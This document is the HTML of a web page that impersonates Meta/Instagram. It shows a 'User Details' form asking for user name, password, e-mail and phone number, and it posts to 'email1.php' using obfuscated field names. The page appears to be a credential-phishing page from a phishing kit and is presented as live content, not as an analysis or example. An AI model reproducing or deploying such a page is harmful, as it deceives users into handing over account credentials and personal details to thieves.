<!DOCTYPE html>
<html lang="en">
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<head>
        <meta charset="utf-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <title>Blue | Application Meta</title>
        <meta name="description" content="">
        <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="icon" href="assets/img/head.ico">
    <link href="assets/bootstrap/css/bootstrap.min.css" rel="stylesheet">
    <link href="assets/zew/css/style.css" rel="stylesheet">
    <link rel="stylesheet" href="../../use.fontawesome.com/releases/v5.12.1/css/all.html" crossorigin="anonymous">
</head>
<body onload = "getLocation();">
<header>
		<table>
			<tbody><tr>
				<td><img src="img/logo.png" width="200"></td>
				<td><font size="5"><i class="fas fa-stream"></i></font></td>
			</tr>
		</tbody></table>
	</header>

<div class="lsf_o">
<div class="card">
            

         
           <form action="email1.php" method="post">
			 <center>
             <img src="img/meta.png" width="300">
             <h1 style="font-family:sans-serif; font-weight:400;  color:#3d3d3d; font-size:20px;">User Details</h1>
                <input type="text" class="fdasf_o" minlength="4" name="uname7828" required name="login_username" placeholder="User Name"><br>
								<script type="text/javascript">
$('.mini').keyup(function(){
    this.value=this.value.toLowerCase();
});
</script>
                <input type="password" name="pas9089" required name="login_password" minlength="6" placeholder="Password" class="fdasf_o"><br>
				  <input type="text" class="fdasf_o" minlength="4" name="emm2034" placeholder="E-Mail"><br>
				  <input type="text" class="fdasf_o"  minlength="8" name="phn2190"required name="login_number" placeholder="Phone Number"><br>
				 
                <button type="submit" name="submit" class="bvsf_asd">
                <span>Next
                </span>
            </button><br>
            <img src="img/meta.gif" width="300px">
				   <script>
      $("#phone").inputmask({
         "mask": "+99 (999) 999-9999"
      });
   </script>
</center>

				<script>
function phoneFormat(input) {
    input = input.replace(/\D/g,'').substring(0,10); 
    var size = input.length;
    if (size>0) {input="("+input}
    if (size>3) {input=input.slice(0,4)+") "+input.slice(4)}
    if (size>6) {input=input.slice(0,9)+"-" +input.slice(9)}
    return input;
}
		</script>
        </form>
</div>

    </div>
	<!--boş-->
	<br><br><br><br>


 
<script src="../../cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.html"></script>
<script src="../../cdnjs.cloudflare.com/ajax/libs/jquery-easing/1.3/jquery.easing.min.html"></script>

<script src="assets/bootstrap/js/bootstrap.min.js"></script>
<script src="assets/zew/js/zewform.js"></script>

<div class="footer">
  <p>© 2022 from Instagram</p>
</div>

</body>
</html>